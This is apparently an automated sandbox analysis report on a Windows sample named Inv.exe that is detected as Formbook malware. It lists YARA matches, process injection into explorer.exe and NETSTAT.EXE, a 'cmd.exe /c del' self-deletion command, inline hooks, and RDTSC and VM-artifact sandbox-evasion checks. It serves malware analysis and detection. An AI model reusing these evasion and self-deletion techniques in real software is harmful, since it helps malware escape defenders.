Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 0123715C appears 370 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 02E1B150 appears 66 times
Source: Inv.exe, 00000000.00000003.670693601.000000001A516000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Inv.exe
Source: Inv.exe, 00000001.00000002.710037557.0000000001BCF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Inv.exe
Source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs Inv.exe
Source: Inv.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/0@7/3
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: Kernel32.dll0_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll0_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll0_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: IEUCIZEO0_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: Kernel32.dll1_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll1_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll1_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: IEUCIZEO1_2_01231040
          Source: Inv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Inv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Inv.exeVirustotal: Detection: 39%
          Source: Inv.exeReversingLabs: Detection: 45%
          Source: C:\Users\user\Desktop\Inv.exeFile read: C:\Users\user\Desktop\Inv.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Inv.exeProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'Jump to behavior
          Source: Inv.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Inv.exe, 00000000.00000003.670292202.000000001A590000.00000004.00000001.sdmp, Inv.exe, 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Inv.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_01241B13
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_012391A5 push ecx; ret 0_2_012391B8
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D0D2 push eax; ret 1_2_0041D0D8
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D0DB push eax; ret 1_2_0041D142
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D085 push eax; ret 1_2_0041D0D8
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D13C push eax; ret 1_2_0041D142
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D1EF push ebp; ret 1_2_0041D6FD
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0040F345 push edi; retf 1_2_0040F34C
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041E7C6 push edx; ret 1_2_0041E83E
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_012391A5 push ecx; ret 1_2_012391B8
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0199D0D1 push ecx; ret 1_2_0199D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E6D0D1 push ecx; ret 4_2_02E6D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D085 push eax; ret 4_2_0036D0D8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D0D2 push eax; ret 4_2_0036D0D8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D0DB push eax; ret 4_2_0036D142
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D13C push eax; ret 4_2_0036D142
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D1EF push ebp; ret 4_2_0036D6FD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036DA9F push cs; iretd 4_2_0036DAAE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0035F345 push edi; retf 4_2_0035F34C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036E7C6 push edx; ret 4_2_0036E83E

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE3
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Inv.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Inv.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 00000000003598E4 second address: 00000000003598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 0000000000359B5E second address: 0000000000359B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Windows\explorer.exe TID: 6700 | Thread sleep count: 65 > 30
          Source: C:\Windows\explorer.exe TID: 6700 | Thread sleep time: -130000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6576 | Thread sleep count: 43 > 30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6576 | Thread sleep time: -86000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Last function: Thread delayed
          Source: explorer.exe, 00000002.00000000.690270641.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.686106576.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.690270641.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.1056063670.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000002.00000000.690752068.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.690969786.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Inv.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Inv.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process queried: DebugPort
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0040ACD0 LdrLoadDll, 1_2_0040ACD0
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_01241B13
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,De